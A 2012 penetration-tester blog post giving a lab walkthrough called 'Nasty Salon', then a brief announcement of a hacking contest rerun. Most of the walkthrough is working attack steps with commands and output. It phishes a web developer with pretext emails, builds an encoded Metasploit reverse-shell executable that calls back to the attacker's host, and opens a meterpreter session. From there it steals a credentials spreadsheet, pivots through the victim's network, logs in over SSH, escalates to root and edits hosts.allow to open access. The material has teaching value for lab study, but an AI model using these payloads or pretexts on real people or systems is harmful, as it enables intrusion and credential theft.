what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Sunday, October 21, 2012

The Nasty Salon Lab


-->
This Lab was codenamed “nasty salon” coz of the exploitation performed behind FW and trusts that this infrastructure has between clients and its administrator.

 We know our server, the target is a webserver, which means a httpd service is running





-->
he next thing we need to do is to try and browse the site, learn about it, the owners, and also we will need to know which services and the OS of this webserver






Nmap scan report for 192.168.1.202
Host is up (0.024s latency).
Not shown: 65350 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.17 ((FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2)
111/tcp open rpcbind 2-4 (rpc #100000)
848/tcp open mountd 1-3 (rpc #100005)
2049/tcp open nfs 2-3 (rpc #100003)
54544/tcp open tcpwrapped

 
-->
We are against a FreeBSD box and we have several ports open, and also we have a tcpwrapped port, wonder what that service is?
Lets check more of the webserver, especially on directories and see we have some other scripted apps or pages, coz this seems like simple html and css. See below,
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ mod_ssl/2.2.17 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ ETag header found on server, inode: 2004948, size: 13930, mtime: 0x4c7ecb4b7db40
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /services/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /styles/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ 6448 items checked: 1 error(s) and 10 item(s) reported on remote host
  • End Time: 2012-08-24 13:33:18 (173 seconds)
-->
This will seem like a bigger task coz when we visit some of these links, and we rolled up a donut

So lets try email the contacts on this site, infosigmer at inbox dot com as shown on the contacts page.

-->
We get to wait for the reply, and the most important variable to look into is which client he/she uses to reply and also the IPs and any other info that comes with it.

And we get a reply.


-->
So her name is Annie, and she developed the site, so she must have unrestricted access to this server, put that on our notes. We also need to know her client, so we look at the source code of the email.

X-Account-Key: account1
X-UIDL: 8690
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:                                                                                 
Received: from info
 
So she is using Mozilla, but is it on Linux or Windows? We need to identify this immediately, so lets set up our play here. This has to be a good social engineering attack, and we need the best performing act and strategy.

-->
So first of all, we need to create a small webserver with some info she can refer to, and also we need to have access to these logs.

We also need to try social engineer her see if she really uses windows or unix, because someone who stopped IT and went to open a Salon could be one or two things, tired of IT stuff and hanging around windows operating systems a lot, or doing some serious Unix/Linux stuff at their free time.

Next email, we need to direct her to our server, but we need to hide the IP since we don't have a domain registered yet. This mail has to be on html tags, href as below

HI Annie.


I lately came across some new designs from the west, i think you should
look into it.

Can i send you a link?


And we get the reply

 



  • -->
    Afternoon,
    
    Please do
    
    Regards,
    
    Annie

    So we immediately do a coded html with link to our rogue webserver

    Okay,

    I have hosted them on my website here, href="http://192.168.1.113" target="_blank">link



    Please check them out, i can send a full url for of them later.




    -->
    This email should look like this on her end as she browses on her machine.


     
    -->
    So we watch our logs as follows









    chuksjonia ~ # cd /var/log/apache2
    chuksjonia apache2 # ls
    chuksjonia apache2 # tail -n 50 access.log -f

    [23/Aug/2012:14:14:52 +0300] "GET / HTTP/1.1" 200 4107 "http://wm52.inbox.com/Lib/120528/mod_email.html" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"

    She is on NT 5.1 , which is windows around XP to 2003. So we have our info, seems enough for now, and its time to exploit her up and we need to create a nice executable to get her on our zombies. If you want to use a java applet the better.

    Here we go, and we are going to use windows/shell/reverse_tcp since is stealth than most of the others, then encode it with several encoders as seen below, and we should have an executable that might work against our target.


    -->
    chuksjonia msf3 # msfpayload windows/shell/reverse_tcp LHOST=192.168.1.113 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/styleview.exe

    -->
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)



    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)



    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)



    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)



    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)



    [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)



    [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)



    [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)



    [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)



    [*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)



    [*] x86/call4_dword_xor succeeded with size 586 (iteration=1)



    [*] x86/call4_dword_xor succeeded with size 614 (iteration=2)



    [*] x86/call4_dword_xor succeeded with size 642 (iteration=3)



    [*] x86/call4_dword_xor succeeded with size 670 (iteration=4)



    [*] x86/call4_dword_xor succeeded with size 698 (iteration=5)



    [*] x86/call4_dword_xor succeeded with size 726 (iteration=6)



    [*] x86/call4_dword_xor succeeded with size 754 (iteration=7)



    [*] x86/call4_dword_xor succeeded with size 782 (iteration=8)



    [*] x86/call4_dword_xor succeeded with size 810 (iteration=9)

    -->
    [*] x86/call4_dword_xor succeeded with size 838 (iteration=10)



    [*] x86/countdown succeeded with size 856 (iterati

    We got the handler waiting on our metasploit as below

     
    -->
    So lets do our email now, and have this lady click on this executable.

    And it would look like this,

    Just open the download, and they should work for you, if the link doesnt work for you, it could be you luck the
    software, so i can get you another link later of the same.

    />Hope to come to your salon soon and have a make over :D

    And now we wait.

    -->
    And Waoh, we have her machine

    msf exploit(handler) > exploit



    [*] Started reverse handler on 192.168.1.113:443

    [*] Starting the payload handler...

    [*] Sending stage (240 bytes) to 192.168.1.106

    [*] Command shell session 1 opened (192.168.1.113:443 -> 192.168.1.106:54498) at 2012-08-23 14:40:33 +0300

      -->

    Microsoft Windows XP [Version 5.1.2600]

    (C) Copyright 1985-2001 Microsoft Corp.



    C:\Program Files\Mozilla Firefox>


    We need to explore this machine and see what it has and what we can use. First things first, we need to find which service is on 54544, the tcpwrapped port, might be of use.

    The machine is behind a router,

    C:\Program Files\Mozilla Firefox>ipconfig

    ipconfig

    -->
    Windows IP Configuration





    Ethernet adapter Local Area Connection:



    Connection-specific DNS Suffix . :

    IP Address. . . . . . . . . . . . : 10.0.2.15

    Subnet Mask . . . . . . . . . . . : 255.255.255.0

    Default Gateway . . . . . . . . . : 10.0.2.2

    That the internal network Annie is using, with the router 10.0.2.2.

    C:\Program Files>telnet 192.168.1.202 54544

    telnet 192.168.1.202 54544











    Seems that port is accessible to her, but we cant figure out what it is, since we are not in an interactive shell. Lets test which connections we have.

    C:\Program Files>netstat -an

    netstat -an



    Active Connections



    Proto Local Address Foreign Address State

    TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

    TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

    TCP 10.0.2.15:139 0.0.0.0:0 LISTENING
    TCP 10.0.2.15:1134 173.194.78.113:80 ESTABLISHED

    TCP 10.0.2.15:1163 192.168.1.202:54544 ESTABLISHED

    TCP 10.0.2.15:1279 192.168.1.113:443 ESTABLISHED

    TCP 10.0.2.15:1287 64.135.83.52:80 ESTABLISHED

    TCP 10.0.2.15:1288 64.135.83.52:80 FIN_WAIT_2

    TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING


    Lets us go to her documents and desktop and also check whats is running on this machine

    Desktop

    C:\Documents and Settings\annie\Desktop>dir

    dir

    -->
    Volume in drive C has no label.

    Volume Serial Number is B49F-7CC8



    Directory of C:\Documents and Settings\annie\Desktop



    08/07/2012 11:55 PM



    .

    08/07/2012 11:55 PM



    ..

    0 File(s) 0 bytes

    -->
    2 Dir(s) 7,588,036,608 bytes free

    -->
    Documents folder

    C:\Documents and Settings\annie\My Documents>dir

    dir

    Volume in drive C has no label.

    Volume Serial Number is B49F-7CC8



    Directory of C:\Documents and Settings\annie\My Documents



    08/23/2012 10:59 AM



    .

    08/23/2012 10:59 AM



    ..

    08/23/2012 02:43 PM



    Downloads

    08/23/2012 10:58 AM 954,880 images.tar

    08/23/2012 10:46 AM



    My Music

    08/23/2012 10:46 AM



    My Pictures

    08/23/2012 10:37 AM 23,040 updatedcredentials.xls

    2 File(s) 977,920 bytes

    5 Dir(s) 7,588,036,608 bytes free



    Interesting information there. We need that excel file, could be having passwords or something much interesting.


    Lets test if ftp runs

    C:\Documents and Settings\annie\My Documents>ftp /?

    ftp> quit

    Aha, thats seems to work, we might need it later.


    Wait, if she uses this machine to log into the server, there must be a software to do that. Lets check the PIDs

    C:\>tasklist

    tasklist

     
    -->

    Image Name PID Session Name Session# Mem Usage

    ========================= ====== ================ ======== ============

    System Idle Process 0 Console 0 16 K

    System 4 Console 0 36 K

    smss.exe 504 Console 0 44 K

    csrss.exe 568 Console 0 2,144 K

    winlogon.exe 592 Console 0 4,240 K

    services.exe 636 Console 0 1,060 K

    lsass.exe 648 Console 0 1,760 K

    svchost.exe 808 Console 0 1,528 K

    svchost.exe 884 Console 0 1,356 K

    svchost.exe 976 Console 0 11,096 K

    svchost.exe 1024 Console 0 1,152 K

    svchost.exe 1068 Console 0 220 K

    spoolsv.exe 1372 Console 0 760 K

    svchost.exe 1472 Console 0 152 K

    alg.exe 120 Console 0 200 K

    explorer.exe 272 Console 0 8,872 K

    wscntfy.exe 216 Console 0 84 K

    firefox.exe 784 Console 0 77,708 K

    putty.exe 560 Console 0 1,596 K

    And we have putty, PID 560. Lets check if its installed fully, and this seems easier than we thought, Directory of C:\Program Files\PuTTY



    08/10/2012 08:36 AM



    .

    08/10/2012 08:36 AM



    ..

    12/10/2011 12:35 PM 1,318 LICENCE

    12/10/2011 12:35 PM 139,264 pageant.exe

    12/10/2011 12:35 PM 303,104 plink.exe

    12/10/2011 12:35 PM 315,392 pscp.exe

    12/10/2011 12:35 PM 327,680 psftp.exe

    12/10/2011 12:35 PM 446,930 putty.chm

    12/10/2011 12:35 PM 32,093 putty.cnt

    12/10/2011 12:35 PM 483,328 putty.exe

    12/10/2011 12:35 PM 657,290 putty.hlp

    12/10/2011 12:35 PM 180,224 puttygen.exe

    01/23/2007 11:38 AM 1,623 README.txt

    08/09/2012 09:39 AM 3,134 unins000.dat

    08/09/2012 09:39 AM 721,838 unins000.exe

    11/16/2004 10:14 PM 103 website.url

    14 File(s) 3,613,321 bytes

    2 Dir(s) 7,587,950,592 bytes free


    This might become an issue, we need something to take it faster like a meterpreter shell

    We need to upgrade this to a meterpreter shell, so open the handler again and make sure your session

    -->
    doesnt interact with the compromised box after you put the older shell on background.

    msf exploit(handler) > exploit -z -j

    -->
    now we need to make sure we get the meterpreter up when we do sessions -u but at the same time to run on our localhost as below So execute the binary again from the downloads folder on the compromised box via the old shell, and background it.

    [*] Started reverse handler on 192.168.1.113:443

    [*] Starting the payload handler...

    msf exploit(handler) > setg LHOST 192.168.1.113

    LHOST => 192.168.1.113

    msf exploit(handler) > setg LPORT 443

    LPORT => 443

    msf exploit(handler) >
    -->
    [*] Sending stage (240 bytes) to 192.168.1.106

    [*] Command shell session 5 opened (192.168.1.113:443 -> 192.168.1.106:54583) at 2012-08-23 15:38:15 +0300


    Now upgrade

    msf exploit(handler) > sessions -u 5



    [*] Started reverse handler on 192.168.1.113:443

    [*] Starting the payload handler...

    [*] Command Stager progress - 1.66% done (1699/102108 bytes)

    [*] Command Stager progress - 3.33% done (3398/102108 bytes)

    [*] Command Stager progress - 4.99% done (5097/102108 bytes)

    [*] Command Stager progress - 6.66% done (6796/102108 bytes)

    [*] Command Stager progress - 8.32% done (8495/102108 bytes)

    [*] Command Stager progress - 9.98% done (10194/102108 bytes)

    [*] Command Stager progress - 11.65% done (11893/102108 bytes)

    [*] Command Stager progress - 13.31% done (13592/102108 bytes)

    [*] Command Stager progress - 14.98% done (15291/102108 bytes)

    [*] Command Stager progress - 16.64% done (16990/102108 bytes)

    [*] Command Stager progress - 18.30% done (18689/102108 bytes)

    [*] Command Stager progress - 19.97% done (20388/102108 bytes)

    [*] Command Stager progress - 21.63% done (22087/102108 bytes)

    [*] Command Stager progress - 23.29% done (23786/102108 bytes)

    [*] Command Stager progress - 24.96% done (25485/102108 bytes)

    [*] Command Stager progress - 26.62% done (27184/102108 bytes)

    [*] Command Stager progress - 28.29% done (28883/102108 bytes)

    [*] Command Stager progress - 29.95% done (30582/102108 bytes)

    [*] Command Stager progress - 31.61% done (32281/102108 bytes)

    [*] Command Stager progress - 33.28% done (33980/102108 bytes)

    [*] Command Stager progress - 34.94% done (35679/102108 bytes)

    [*] Command Stager progress - 36.61% done (37378/102108 bytes)

    [*] Command Stager progress - 38.27% done (39077/102108 bytes)

    [*] Command Stager progress - 39.93% done (40776/102108 bytes)

    [*] Command Stager progress - 41.60% done (42475/102108 bytes)

    [*] Command Stager progress - 43.26% done (44174/102108 bytes)

    [*] Command Stager progress - 44.93% done (45873/102108 bytes)

    [*] Command Stager progress - 46.59% done (47572/102108 bytes)

    [*] Command Stager progress - 48.25% done (49271/102108 bytes)

    [*] Command Stager progress - 49.92% done (50970/102108 bytes)

    [*] Command Stager progress - 51.58% done (52669/102108 bytes)

    [*] Command Stager progress - 53.25% done (54368/102108 bytes)

    [*] Command Stager progress - 54.91% done (56067/102108 bytes)

    [*] Command Stager progress - 56.57% done (57766/102108 bytes)

    [*] Command Stager progress - 58.24% done (59465/102108 bytes)

    [*] Command Stager progress - 59.90% done (61164/102108 bytes)

    [*] Command Stager progress - 61.57% done (62863/102108 bytes)

    [*] Command Stager progress - 63.23% done (64562/102108 bytes)

    [*] Command Stager progress - 64.89% done (66261/102108 bytes)

    [*] Command Stager progress - 66.56% done (67960/102108 bytes)

    [*] Command Stager progress - 68.22% done (69659/102108 bytes)

    [*] Command Stager progress - 69.88% done (71358/102108 bytes)

    [*] Command Stager progress - 71.55% done (73057/102108 bytes)

    [*] Command Stager progress - 73.21% done (74756/102108 bytes)

    [*] Command Stager progress - 74.88% done (76455/102108 bytes)

    [*] Command Stager progress - 76.54% done (78154/102108 bytes)

    [*] Command Stager progress - 78.20% done (79853/102108 bytes)

    [*] Command Stager progress - 79.87% done (81552/102108 bytes)

    [*] Command Stager progress - 81.53% done (83251/102108 bytes)

    [*] Command Stager progress - 83.20% done (84950/102108 bytes)

    [*] Command Stager progress - 84.86% done (86649/102108 bytes)

    [*] Command Stager progress - 86.52% done (88348/102108 bytes)

    [*] Command Stager progress - 88.19% done (90047/102108 bytes)

    [*] Command Stager progress - 89.85% done (91746/102108 bytes)

    [*] Command Stager progress - 91.52% done (93445/102108 bytes)

    [*] Command Stager progress - 93.18% done (95144/102108 bytes)

    [*] Command Stager progress - 94.84% done (96843/102108 bytes)

    [*] Command Stager progress - 96.51% done (98542/102108 bytes)

    [*] Command Stager progress - 98.15% done (100216/102108 bytes)

    [*] Command Stager progress - 99.78% done (101888/102108 bytes)

    [*] Sending stage (752128 bytes) to 192.168.1.106

    [*] Command Stager progress - 100.00% done (102108/102108 bytes)

    msf exploit(handler) > [*] Meterpreter session 6 opened (192.168.1.113:443 -> 192.168.1.106:54584) at 2012-08-23 15:40:17 +0300

       -->
    Now u should be having three sessions by now, if you do

    msf exploit(handler) > sessions -l



    Active sessions

    ===============



    Id Type Information Connection

    -- ---- ----------- ----------

    4 shell windows Microsoft Windows XP [Version 5.1.2600] 192.168.1.113:443 -> 192.168.1.106:54574 (192.168.1.106)

    5 shell windows Microsoft Windows XP [Version 5.1.2600] 192.168.1.113:443 -> 192.168.1.106:54583 (192.168.1.106)

    6 meterpreter x86/win32 ALICE_BUKU\annie @ ALICE_BUKU 192.168.1.113:443 -> 192.168.1.106:54584 (10.0.2.15)

    -->
    We need to interact with the awesome metepreter and get those files

    -->
    msf exploit(handler) > sessions -i 6

    [*] Starting interaction with 6...

    meterpreter > cd \
    meterpreter > pwd

    meterpreter > cd "Documents and Settings"


    meterpreter > pwd

    C:\Documents and Settings

    So we go all way,

    meterpreter > cd "My Documents"

    meterpreter > pwd

    C:\Documents and Settings\annie\My Documents

    meterpreter > download updatedcredentials.xls

    [*] downloading: updatedcredentials.xls -> updatedcredentials.xls

    [*] downloaded : updatedcredentials.xls -> updatedcredentials.xls

    And now we have it, so lets see whats there


    -->
    Seems like passwords to me. We have to find this port, and I suspect port 54544. Lest route our session coz annies machine is allowed to connect to this port

    -->
    meterpreter > run get_local_subnets

    Local subnet: 10.0.2.0/255.255.255.0


    [*] Backgrounding session 6...

    msf exploit(handler) > route add 10.0.2.0 255.255.255.0 6

    [*] Route added

    msf exploit(handler) > route print



    Active Routing Table

    ====================

    -->

    Subnet Netmask Gateway

    ------ ------- -------

    10.0.2.0 255.255.255.0 Session 6


    Lets scan the server now on port 54544

    msf auxiliary(tcp) > run



    [*] 192.168.1.202:54544 - TCP OPEN

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed


    Lets try log in

    msf auxiliary(ssh_login) > set PASSWORD 'the bsd box as u wish'

    PASSWORD => the bsd box as u wish

     
    -->
    msf auxiliary(ssh_login) > run



    [*] 192.168.1.202:54544 SSH - Starting bruteforce

    [*] 192.168.1.202:54544 SSH - [1/3] - Trying: username: 'annie' with password: ''

    [-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error

    [-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error

    [-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error

    [-] 192.168.1.202:54544 SSH - [1/3] - Connection timed out

    [-] 192.168.1.202:54544 SSH - [1/3] - Bruteforce cancelled against this service.

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed


    Seems we are not allowed to bruteforce.

    So lets go to shell

    msf auxiliary(ssh_login) > sessions -i 6

    [*] Starting interaction with 6...



    meterpreter > shell

    And we need putty binaries so that we can log into this box, lets try passwords, we have

    C:\Program Files\PuTTY>plink -P 54544 192.168.1.202

    plink -P 54544 192.168.1.202

    login as: annie





    Using keyboard-interactive authentication.

    Password:

    Using keyboard-interactive authentication.

    Password:all changes



    Last login: Thu Aug 23 19:10:48 2012 from 192.168.1.106

    Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994

    The Regents of the University of California. All rights reserved.



    FreeBSD 8.2-RELEASE (GENERIC) #0: Fri Feb 18 02:24:46 UTC 2011



    Welcome to FreeBSD!



    Before seeking technical support, please use the following resources:



    o Security advisories and updated errata information for all releases are

    at http://www.FreeBSD.org/releases/ - always consult the ERRATA section

    for your release first as it's updated frequently.



    o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,

    along with the mailing lists, can be searched by going to

    http://www.FreeBSD.org/search/. If the doc distribution has

    been installed, they're also available formatted in /usr/share/doc.



    If you still have a question or problem, please take the output of

    `uname -a', along with any relevant error messages, and email it

    as a question to the questions@FreeBSD.org mailing list. If you are
      xxxxxxxxxxx  -->

    [annie@office ~]$


    And we are already logged in

    So we can try see if the other password is owned by the root user.

    [annie@office ~]$ su -l

    su -l
    -->
    Password:the bsd box as u wish



    office#


    And we are so far in.




    Next up, we need to be able to reach this service from our machine, so we check the /etc/rc.conf and also the /etc/hosts.allow

      -->
    Edit this file by vi and add the configuration to our ip on top as follows.

    sshd : 192.168.1.113 : allow




    After that from our local machine, if we scan port 54544 we should see the service up

    # nmap -sV -PN 192.168.1.202 -p54544

    Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-23 16:36 EAT
    Nmap scan report for 192.168.1.202
    Host is up (0.088s latency).
    PORT STATE SERVICE VERSION
    54544/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
    MAC Address: 68:5D:43:09:97:23 (Unknown)
    Service Info: OS: FreeBSD
    and we log in with annie

     










    GAME OVER   

    Friday, October 12, 2012

    HackBattle2012 The rerun

    HackBattle 2012 which had started last week, opened with the Blackhat team (Blackdiamond) gaining access to the two servers faster than we expected. They were followed by team Ownerz and team Takerz. We had set several vulnerabilities and were fully tested, and worked well for each network. After the blackhats took over, they set up several backdoors and malwares pieces, which the team that took over the servers was expected to identify and quarantine forensically before 8th of October 2012. As this time approached most of the teams realized the team Blackdiamond had already gained through and they wondered how they did that.

    On 8th in the afternoon team Blackdiamond came back in, pkilled every process on each TTY, and regained control of the servers, therefore winning this year.

    So on 9th we decided to bring the game back with a new sceneraio as below. We are calling it Hackbattle2012 'The Rerun'.





    So the scenario is as below, we have a network with two servers, both webservers, one acting as a blog server and the other as normal website. Both of these servers are vulnerable to different flaws, e.g SQLi, LFI, Information Disclosure etc.

    These servers are controlled by several users, sitting behind their laptops and its business as usual. This penetration scenario is BLACKBOX and so all attackers are supposed to be covert, and should use any means necessary to gain access to the infrastructure.

    The above is made simpler and should help all the groups understand some pentest skills as they work together and exchange ideas. Kinda of Knowledge transfer for everyone.


    Am also giving out small clues and directions to those who ask me about what to look for etc.

    Enjoy the game, and remember more practice and the perfect you get.

    See all teams tomorrow at CIO East Africa office.

    Cheers,

    ./Chucks